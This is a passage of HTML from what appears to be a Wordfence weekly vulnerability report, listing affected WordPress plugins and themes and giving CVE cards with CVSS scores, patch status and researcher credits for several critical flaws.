</tr>
<tr>
<td>SupportCandy – AI Customer Support Ticket System &amp; Live Chatbot Agent</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/supportcandy" target="_blank" rel="noopener">supportcandy</a>
		</td>
</tr>
<tr>
<td>Swatchly – Product Variation Swatches for WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/swatchly" target="_blank" rel="noopener">swatchly</a>
		</td>
</tr>
<tr>
<td>TabaPay Gateway</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/tabapay-gateway" target="_blank" rel="noopener">tabapay-gateway</a>
		</td>
</tr>
<tr>
<td>Table Of Contents Block</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/table-of-contents-block" target="_blank" rel="noopener">table-of-contents-block</a>
		</td>
</tr>
<tr>
<td>Tag, Category, and Taxonomy Manager – Autotagger Automatically Add Terms</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/simple-tags" target="_blank" rel="noopener">simple-tags</a>
		</td>
</tr>
<tr>
<td>Tagembed: Social Media Feeds and Customer Reviews Widget</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/tagembed-widget" target="_blank" rel="noopener">tagembed-widget</a>
		</td>
</tr>
<tr>
<td>Templatiq</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/templatiq" target="_blank" rel="noopener">templatiq</a>
		</td>
</tr>
<tr>
<td>Themify Builder</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/themify-builder" target="_blank" rel="noopener">themify-builder</a>
		</td>
</tr>
<tr>
<td>Tonda Core</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/tonda-core" target="_blank" rel="noopener">tonda-core</a>
		</td>
</tr>
<tr>
<td>Total Donations</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/totaldonations" target="_blank" rel="noopener">totaldonations</a>
		</td>
</tr>
<tr>
<td>Track Geolocation Of Users Using Contact Form 7</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/track-geolocation-of-users-using-contact-form-7" target="_blank" rel="noopener">track-geolocation-of-users-using-contact-form-7</a>
		</td>
</tr>
<tr>
<td>TranslatePress – Translate Multilingual sites with AI Translation</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/translatepress-multilingual" target="_blank" rel="noopener">translatepress-multilingual</a>
		</td>
</tr>
<tr>
<td>TrueBooker – Appointment Booking and Scheduler System</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/truebooker-appointment-booking" target="_blank" rel="noopener">truebooker-appointment-booking</a>
		</td>
</tr>
<tr>
<td>Typing Effect</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/animated-typing-effect" target="_blank" rel="noopener">animated-typing-effect</a>
		</td>
</tr>
<tr>
<td>Ultimate Dashboard – Custom WordPress Dashboard</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ultimate-dashboard" target="_blank" rel="noopener">ultimate-dashboard</a>
		</td>
</tr>
<tr>
<td>Ultimate Maps by Supsystic</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ultimate-maps-by-supsystic" target="_blank" rel="noopener">ultimate-maps-by-supsystic</a>
		</td>
</tr>
<tr>
<td>URL Shortify – Simple and Easy URL Shortener</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/url-shortify" target="_blank" rel="noopener">url-shortify</a>
		</td>
</tr>
<tr>
<td>User Registration PRO – Custom Registration Form, Login Form, and User Profile WordPress Plugin</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/user-registration-pro" target="_blank" rel="noopener">user-registration-pro</a>
		</td>
</tr>
<tr>
<td>User Verification by PickPlugins</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/user-verification" target="_blank" rel="noopener">user-verification</a>
		</td>
</tr>
<tr>
<td>Verdure Core</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/verdure-core" target="_blank" rel="noopener">verdure-core</a>
		</td>
</tr>
<tr>
<td>Video Conferencing with Zoom</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/video-conferencing-with-zoom-api" target="_blank" rel="noopener">video-conferencing-with-zoom-api</a>
		</td>
</tr>
<tr>
<td>Visualizer – Tables &amp; Charts Manager with Built-in AI Generator</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/visualizer" target="_blank" rel="noopener">visualizer</a>
		</td>
</tr>
<tr>
<td>W3 Total Cache</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/w3-total-cache" target="_blank" rel="noopener">w3-total-cache</a>
		</td>
</tr>
<tr>
<td>WCFM Marketplace – Multivendor Marketplace for WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wc-multivendor-marketplace" target="_blank" rel="noopener">wc-multivendor-marketplace</a>
		</td>
</tr>
<tr>
<td>WebToffee WooCommerce PDF Invoices, Packing Slips, Delivery Notes &amp; Shipping Labels</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/print-invoices-packing-slip-labels-for-woocommerce" target="_blank" rel="noopener">print-invoices-packing-slip-labels-for-woocommerce</a>
		</td>
</tr>
<tr>
<td>Wise Chat</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wise-chat" target="_blank" rel="noopener">wise-chat</a>
		</td>
</tr>
<tr>
<td>WP BASE Booking of Appointments, Services and Events</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-base-booking-of-appointments-services-and-events" target="_blank" rel="noopener">wp-base-booking-of-appointments-services-and-events</a>
		</td>
</tr>
<tr>
<td>WP Cafe Pro</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/UNKNOWN-CVE-2026-66586" target="_blank" rel="noopener">wpcafe-pro</a>
		</td>
</tr>
<tr>
<td>WP Compress – Instant Performance &amp; Speed Optimization</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-compress-image-optimizer" target="_blank" rel="noopener">wp-compress-image-optimizer</a>
		</td>
</tr>
<tr>
<td>WP Data Access – App Builder for Tables, Forms, Charts, Maps &amp; Dashboards</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-data-access" target="_blank" rel="noopener">wp-data-access</a>
		</td>
</tr>
<tr>
<td>WP Directory Kit</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpdirectorykit" target="_blank" rel="noopener">wpdirectorykit</a>
		</td>
</tr>
<tr>
<td>WP Maps – Google Maps,OpenStreetMap,Mapbox,Store Locator,Listing,Directory &amp; Filters</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-google-map-plugin" target="_blank" rel="noopener">wp-google-map-plugin</a>
		</td>
</tr>
<tr>
<td>WP Multilang – Translation and Multilingual Plugin</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-multilang" target="_blank" rel="noopener">wp-multilang</a>
		</td>
</tr>
<tr>
<td>WP Project Manager Pro</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wedevs-project-manager-business" target="_blank" rel="noopener">wedevs-project-manager-business</a>
		</td>
</tr>
<tr>
<td>WP Statistics – Simple, privacy-friendly Google Analytics alternative</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-statistics" target="_blank" rel="noopener">wp-statistics</a>
		</td>
</tr>
<tr>
<td>WP Tab Widget</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-tab-widget" target="_blank" rel="noopener">wp-tab-widget</a>
		</td>
</tr>
<tr>
<td>WP w3all phpBB</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-w3all-phpbb-integration" target="_blank" rel="noopener">wp-w3all-phpbb-integration</a>
		</td>
</tr>
<tr>
<td>WPAdverts – Classifieds Plugin</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpadverts" target="_blank" rel="noopener">wpadverts</a>
		</td>
</tr>
<tr>
<td>WPComplete</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpcomplete" target="_blank" rel="noopener">wpcomplete</a>
		</td>
</tr>
<tr>
<td>wpDataTables – WordPress Data Table, Dynamic Tables &amp; Table Charts Plugin</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpdatatables-2" target="_blank" rel="noopener">wpdatatables</a>
		</td>
</tr>
<tr>
<td>WPeMatico RSS Feed Fetcher</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpematico" target="_blank" rel="noopener">wpematico</a>
		</td>
</tr>
<tr>
<td>WPForms Pro</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpforms" target="_blank" rel="noopener">wpforms</a>
		</td>
</tr>
<tr>
<td>WPLP Cookie Consent – Cookie Banner &amp; Consent Management for GDPR, CCPA &amp; Google Consent Mode</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/gdpr-cookie-consent" target="_blank" rel="noopener">gdpr-cookie-consent</a>
		</td>
</tr>
<tr>
<td>WPS Bidouille</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wps-bidouille" target="_blank" rel="noopener">wps-bidouille</a>
		</td>
</tr>
<tr>
<td>WPvivid — Backup, Migration &amp; Staging</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpvivid-backuprestore" target="_blank" rel="noopener">wpvivid-backuprestore</a>
		</td>
</tr>
<tr>
<td>WPZOOM Forms – Drag &amp; Drop Contact Form Builder for WordPress</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpzoom-forms" target="_blank" rel="noopener">wpzoom-forms</a>
		</td>
</tr>
<tr>
<td>WS Form LITE – Drag &amp; Drop Contact Form Builder</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ws-form" target="_blank" rel="noopener">ws-form</a>
		</td>
</tr>
<tr>
<td>Wufoo Shortcode</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wufoo-shortcode" target="_blank" rel="noopener">wufoo-shortcode</a>
		</td>
</tr>
<tr>
<td>YayCurrency – WooCommerce Multi-Currency Switcher</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/yaycurrency" target="_blank" rel="noopener">yaycurrency</a>
		</td>
</tr>
<tr>
<td>YITH WooCommerce Membership Premium</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/UNKNOWN-CVE-2026-32552" target="_blank" rel="noopener">yith-woocommerce-membership-premium</a>
		</td>
</tr>
<tr>
<td>Youzify – BuddyPress Community, User Profile, Social Network &amp; Membership Plugin for WordPress</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/youzify" target="_blank" rel="noopener">youzify</a>
		</td>
</tr>
</table>
<hr>
<h3>WordPress Themes with Reported Vulnerabilities Last Week</h3>
</p>
<table class="wfvr-list-table software-list">
<tr>
<th class="text-center w-50">Software Name</th>
<th class="text-center">Software Slug</th>
</tr>
<tr>
<td>Altair</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/altair" target="_blank" rel="noopener">altair</a>
		</td>
</tr>
<tr>
<td>Aora &#8211; Home &amp; Lifestyle Elementor WooCommerce Theme</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/aora" target="_blank" rel="noopener">aora</a>
		</td>
</tr>
<tr>
<td>Capella | Restaurant WordPress</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/capella" target="_blank" rel="noopener">capella</a>
		</td>
</tr>
<tr>
<td>Chaplin</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/chaplin" target="_blank" rel="noopener">chaplin</a>
		</td>
</tr>
<tr>
<td>FreightCo – Free Transportation &amp; Logistics WordPress Theme</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/freightco" target="_blank" rel="noopener">freightco</a>
		</td>
</tr>
<tr>
<td>Homlisti</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/UNKNOWN-CVE-2026-66647" target="_blank" rel="noopener">homlisti</a>
		</td>
</tr>
<tr>
<td>IT Residence</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/it-residence" target="_blank" rel="noopener">it-residence</a>
		</td>
</tr>
<tr>
<td>Jawn</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/jawn" target="_blank" rel="noopener">jawn</a>
		</td>
</tr>
<tr>
<td>Koji</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/koji" target="_blank" rel="noopener">koji</a>
		</td>
</tr>
<tr>
<td>Mane</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/mane" target="_blank" rel="noopener">mane</a>
		</td>
</tr>
<tr>
<td>Resido &#8211; Real Estate WordPress Theme</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/resido" target="_blank" rel="noopener">resido</a>
		</td>
</tr>
<tr>
<td>Shuffle</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/shuffle" target="_blank" rel="noopener">shuffle</a>
		</td>
</tr>
<tr>
<td>Smart Cleaning</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/smart-cleaning" target="_blank" rel="noopener">smart-cleaning</a>
		</td>
</tr>
<tr>
<td>TheGem &#8211; Creative Multi-Purpose &amp; WooCommerce WordPress Theme</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/thegem-elementor" target="_blank" rel="noopener">thegem-elementor</a>
		</td>
</tr>
<tr>
<td>Tonda &#8211; Elegant Shop WordPress Theme</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/tonda" target="_blank" rel="noopener">tonda</a>
		</td>
</tr>
<tr>
<td>Urna &#8211; All-in-one WooCommerce WordPress Theme</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/urna" target="_blank" rel="noopener">urna</a>
		</td>
</tr>
<tr>
<td>Warehouse Cargo</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/warehouse-cargo" target="_blank" rel="noopener">warehouse-cargo</a>
		</td>
</tr>
</table>
<hr>
<h3>Vulnerability Details</h3>
<p>Please note that if you run the Wordfence plugin on your WordPress site, with the scanner enabled, you should’ve already been notified if your site was affected by any of these vulnerabilities. If you’d like to receive real-time notifications whenever a vulnerability is added to the Wordfence Intelligence Vulnerability Database, <a href="https://www.wordfence.com/help/wordfence-intelligence-webhook-notifications/" target="_blank" rel="noopener">check out our Slack and HTTP Webhook Integration</a>, which is completely free to utilize.</p>
</p>
<div class="wfvr-vulnerabilities">
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7e473896-d94c-4f6a-a96c-bb90902532cc" target="_blank" rel="noopener">Automation Web Platform &lt;= 4.8.6 &#8211; Unauthenticated Authentication Bypass via &#8216;otp_transient&#8217; Token Disclosure</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-77264" target="_blank" rel="noopener noreferrer">							CVE-2026-77264						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 20, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/automation-web-platform" target="_blank" rel="noopener">Automation Web Platform – Notifications and OTP for WooCommerce, Advanced Country Code</a> <span class="wfvr-software-slug">[automation-web-platform]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/anton-naumovich" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/9e8c4676e82018ccf86cc684191f1e94.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="9e8c4676e82018ccf86cc684191f1e94"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/anton-naumovich" target="_blank" rel="noopener">RIA Labs</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7e473896-d94c-4f6a-a96c-bb90902532cc" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/fd3b95ce-3051-4b41-8bf4-362fa6be6ce5" target="_blank" rel="noopener">Broken Link Checker &lt; 2.4.12 &#8211; Unauthenticated Remote Code Execution</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-18937" target="_blank" rel="noopener noreferrer">							CVE-2026-18937						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 21, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/broken-link-checker" target="_blank" rel="noopener">Broken Link Checker</a> <span class="wfvr-software-slug">[broken-link-checker]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-herman" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/d36a048c5f4fe8795a861da6334611fa.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d36a048c5f4fe8795a861da6334611fa"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-herman" target="_blank" rel="noopener">Jakub Herman</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/fd3b95ce-3051-4b41-8bf4-362fa6be6ce5" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9a3ba904-d0b7-4df1-a36a-3a36cc252641" target="_blank" rel="noopener">DynamicKit for Elementor &lt; 1.0.3 &#8211; Unauthenticated Privilege Escalation via Account Takeover</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14596" target="_blank" rel="noopener noreferrer">							CVE-2026-14596						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/dynamickit-elementor" target="_blank" rel="noopener">DynamicKit for Elementor</a> <span class="wfvr-software-slug">[dynamickit-elementor]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pedro-pinho" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/10dc2bd424adaa3236fb2e17dcdba9db.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="10dc2bd424adaa3236fb2e17dcdba9db"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pedro-pinho" target="_blank" rel="noopener">Pedro Pinho</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9a3ba904-d0b7-4df1-a36a-3a36cc252641" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0a32b02f-db40-42fe-b46c-4a5f2bc9ba09" target="_blank" rel="noopener">Elementor Pro &lt;= 4.2.1 &#8211; Unauthenticated Arbitrary File Upload via Upload Field Array Validation Bypass</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-32475" target="_blank" rel="noopener noreferrer">							CVE-2026-32475						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 19, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/elementor-pro" target="_blank" rel="noopener">Elementor Website Builder Pro</a> <span class="wfvr-software-slug">[elementor-pro]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researchers</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/tin-pham-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/8ec93bb7e5ec96ab4636699e413382c9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8ec93bb7e5ec96ab4636699e413382c9"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/tin-pham-2" target="_blank" rel="noopener">Tin Pham (TF1T)</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/austin-ginder" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4ecc8b71d0984f421844d12e862a7638.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4ecc8b71d0984f421844d12e862a7638"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/austin-ginder" target="_blank" rel="noopener">Austin Ginder</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0a32b02f-db40-42fe-b46c-4a5f2bc9ba09" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/263ac05d-f1ca-46e3-a43e-3b45eb8066d4" target="_blank" rel="noopener">Forminator Forms &lt;= 1.56.1 &#8211; Unauthenticated Arbitrary File Upload via Forged Upload Field Configuration</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15748" target="_blank" rel="noopener noreferrer">							CVE-2026-15748						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/forminator" target="_blank" rel="noopener">Forminator Forms – Contact Form, Payment Form &amp; Custom Form Builder</a> <span class="wfvr-software-slug">[forminator]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7965cd13376a540548ec7009cd66b05b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7965cd13376a540548ec7009cd66b05b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener">daroo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/263ac05d-f1ca-46e3-a43e-3b45eb8066d4" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e0642c85-ee01-497c-8dc3-42e3ffc02995" target="_blank" rel="noopener">Jawn &lt;= 1.4.2 &#8211; Unauthenticated Privilege Escalation</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-78477" target="_blank" rel="noopener noreferrer">							CVE-2026-78477						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 20, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/jawn" target="_blank" rel="noopener">Jawn</a> <span class="wfvr-software-slug">[jawn]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/tran-nguyen-bao-khanh-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/tran-nguyen-bao-khanh-2" target="_blank" rel="noopener">Tran Nguyen Bao Khanh</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e0642c85-ee01-497c-8dc3-42e3ffc02995" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/74e00d27-1462-4225-b205-da4c2e480de3" target="_blank" rel="noopener">JetEngine &lt;= 3.8.14 &#8211; Unauthenticated Remote Code Execution</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
